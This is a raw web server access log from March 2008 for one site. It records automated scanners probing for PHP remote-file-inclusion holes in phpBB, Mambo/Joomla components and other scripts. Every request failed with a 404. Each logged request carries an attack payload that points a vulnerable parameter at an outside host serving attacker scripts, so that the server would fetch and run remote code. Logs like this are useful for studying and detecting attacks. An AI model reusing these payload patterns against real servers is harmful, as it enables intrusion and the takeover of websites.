216.246.77.203 - - [31/Mar/2008:21:16:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:16:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.191.58.12 - - [31/Mar/2008:21:18:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.191.58.12 - - [31/Mar/2008:21:18:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.191.58.12 - - [31/Mar/2008:21:18:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.191.58.12 - - [31/Mar/2008:21:18:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.191.58.12 - - [31/Mar/2008:21:18:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.191.58.12 - - [31/Mar/2008:21:18:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:21:48 -0700] "GET /logs/index.php?body=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:21:50 -0700] "GET /index.php?body=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:22:06 -0700] "GET //forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.78.223 - - [31/Mar/2008:21:22:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.78.223 - - [31/Mar/2008:21:22:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.78.223 - - [31/Mar/2008:21:22:25 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:21:22:36 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:21:22:36 -0700] "GET /modules/My_eGallery/index.php?basepath=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:21:22:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:31:20 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:31:34 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:21:37:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [31/Mar/2008:21:38:58 -0700] "GET /logs/access.log//components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [31/Mar/2008:21:38:58 -0700] "GET //components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [31/Mar/2008:21:38:58 -0700] "GET /logs//components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:41:28 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:41:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:41:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
80.93.17.10 - - [31/Mar/2008:21:45:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.bsfadvisors.com"
80.93.17.10 - - [31/Mar/2008:21:45:05 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.bsfadvisors.com"
82.194.75.119 - - [31/Mar/2008:21:45:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
82.194.75.119 - - [31/Mar/2008:21:45:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:21:46:24 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:21:46:24 -0700] "GET //config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:21:46:25 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
213.239.177.121 - - [31/Mar/2008:21:46:33 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [31/Mar/2008:21:46:33 -0700] "GET //config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [31/Mar/2008:21:46:33 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.214.53.21 - - [31/Mar/2008:21:46:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
85.214.53.21 - - [31/Mar/2008:21:46:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:21:49:14 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:21:49:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:21:50:03 -0700] "GET /logs/access.log/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:21:50:06 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:21:50:07 -0700] "GET /logs/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:21:50:08 -0700] "GET //config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
87.253.132.5 - - [31/Mar/2008:21:51:08 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.253.132.5 - - [31/Mar/2008:21:51:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.248.59.8 - - [31/Mar/2008:21:51:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.248.59.8 - - [31/Mar/2008:21:51:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:52:15 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:52:16 -0700] "GET //config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:52:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.16.16.208 - - [31/Mar/2008:21:52:33 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [31/Mar/2008:21:52:33 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [31/Mar/2008:21:52:34 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [31/Mar/2008:21:52:37 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [31/Mar/2008:21:52:37 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [31/Mar/2008:21:52:37 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:52:54 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:52:55 -0700] "GET //config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:52:56 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:57:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:58:58 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:58:59 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
203.211.135.191 - - [31/Mar/2008:21:58:59 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.108.66.169 - - [31/Mar/2008:21:59:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
208.201.241.88 - - [31/Mar/2008:22:01:35 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
208.201.241.88 - - [31/Mar/2008:22:01:36 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
208.201.241.88 - - [31/Mar/2008:22:01:36 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:05:59 -0700] "GET //config/dbutil.bck.php?confdir=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.78.223 - - [31/Mar/2008:22:06:11 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.78.223 - - [31/Mar/2008:22:06:11 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.78.223 - - [31/Mar/2008:22:06:12 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.108.66.169 - - [31/Mar/2008:22:06:17 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:08:26 -0700] "GET /logs/access.log//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:08:28 -0700] "GET /logs//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.86.152.130 - - [31/Mar/2008:22:10:20 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
70.86.152.130 - - [31/Mar/2008:22:10:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
70.86.152.130 - - [31/Mar/2008:22:10:20 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
87.233.130.112 - - [31/Mar/2008:22:10:26 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/bornok911/safeAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
87.233.130.112 - - [31/Mar/2008:22:10:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/bornok911/safeAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
87.233.130.112 - - [31/Mar/2008:22:10:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/bornok911/safeAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:22:10:40 -0700] "GET /logs/access.log/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:22:10:41 -0700] "GET /logs/access.log/index.php?theme=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:22:10:41 -0700] "GET /index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:22:10:42 -0700] "GET /index.php?theme=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:22:10:42 -0700] "GET /logs/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:22:10:43 -0700] "GET /logs/index.php?theme=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
66.7.205.115 - - [31/Mar/2008:22:11:33 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.interkros.cz/images/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.7.205.115 - - [31/Mar/2008:22:11:33 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.interkros.cz/images/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:18:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:18:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:18:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:18:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.9.37.130 - - [31/Mar/2008:22:19:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
69.9.37.130 - - [31/Mar/2008:22:19:55 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
204.10.243.102 - - [31/Mar/2008:22:21:57 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
204.10.243.102 - - [31/Mar/2008:22:21:57 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
85.114.132.12 - - [31/Mar/2008:22:30:30 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
85.114.132.12 - - [31/Mar/2008:22:30:31 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.bsfadvisors.com"
203.22.204.188 - - [31/Mar/2008:22:31:13 -0700] "GET /logs/phprojekt/lib/lib.inc.php?path_pre=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
203.22.204.188 - - [31/Mar/2008:22:31:13 -0700] "GET /phprojekt/lib/lib.inc.php?path_pre=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
